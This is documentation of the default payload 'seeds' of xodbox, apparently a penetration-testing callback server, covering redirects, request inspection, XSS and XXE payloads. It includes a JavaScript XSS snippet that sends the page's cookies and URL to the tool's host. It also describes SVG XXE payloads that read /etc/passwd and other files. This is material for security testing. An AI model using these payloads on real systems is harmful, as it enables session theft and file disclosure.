This is the multi-page printable view of this section. Click here to print.

Return to the regular view of this page.

Default Payloads Seeds

seed data

1: Default Header
2: Redirect
3: Robots TXT
4: Inspect
5: XSS HTML
6: XSS JavaScript
7: Default Favicon
8: HTML Iframe
9: Open Graph
10: XXE Callback
11: XXE DTD
12: XXE SVG Hostname
13: XXE SVG Passwd
14: XXE SVG Request Params
15: XXE System
16: Default Page
17: In Development Seeds

17.1: WPAD

Default payloads that come with xodbox.

1 - Default Header

Adds the default header to all HTTP responses.

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

2 - Redirect

HTTP Redirects

HTTP Redirects to the query parameter l using the query param s as the status code.

What	Description	GET Parameters
Location	Location to redirect to	`l`
Status	HTTP status code	`s`

Example Request

curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"

Example Response

Location: https://github.com/defektive/xodbox

3 - Robots TXT

A restrictive robots.txt

Simple robots txt to prevent indexing.

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

4 - Inspect

Reflect back HTTP requests in various formats

Depends on an internal code

`/inspect`

Inspect or reflect the request back in various formats.

Plain Text (default, .txt)
HTML (.html, .html)
GIF (.gif)
JPEG (.jpg)
PNG (.png)
MP4 (.mp4)
XML (.xml)
JSON (.json)
Javascript (.js)

Examples

http://localhost/inspect
http://localhost/some/random/path/inspect.gif

5 - XSS HTML

Returns HTML that embeds xss-js

/jsc.html

Simple HTML to load simple JS Payload.

6 - XSS JavaScript

Returns JS that embeds an image back to xodbox

/jsc

Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.

(function (){
    var s = document.createElement("img");
    document.body.appendChild(s);
    s.src="//{{ .Host }}/jscb?src="+window.location+"&c="+document.cookie;
})()

7 - Default Favicon

Redirects to the default logo.

Redirects to the embedded default logo, exposed via embedded fs.

Example Request

curl -i http://xodbox.test/favicon.ico

8 - HTML Iframe

HTML page with iframe and image callback

/ht

Iframe callback

9 - Open Graph

Embed request params in open graph elements.

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"

Example Response

Location: https://github.com/defektive/xodbox

10 - XXE Callback

More XXE

XXE Callback used by xxe-system

11 - XXE DTD

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

/evil.dtd

dtd for use by others

12 - XXE SVG Hostname

Returns an SVG payload with XXE to get files

/sh

attempts to get /etc/hostname

SVG with XXE payloads

13 - XXE SVG Passwd

Returns an SVG payload with XXE to get files

/sp

attempts to get /etc/passwd

14 - XXE SVG Request Params

Returns an SVG payload with XXE to get files

/sv

attempts to get whatever files is supplied via the f query parameter

15 - XXE System

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

16 - Default Page

returns a simple page if nothing is matched

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

hi

17 - In Development Seeds

These seeds are not ready for production and may never be.

Seeds that are not tested or finished.

17.1 - WPAD

Returns a WPAD config file (Javascript).

WPAD Proxy. Not really useful at the moment. Should be more useful in the future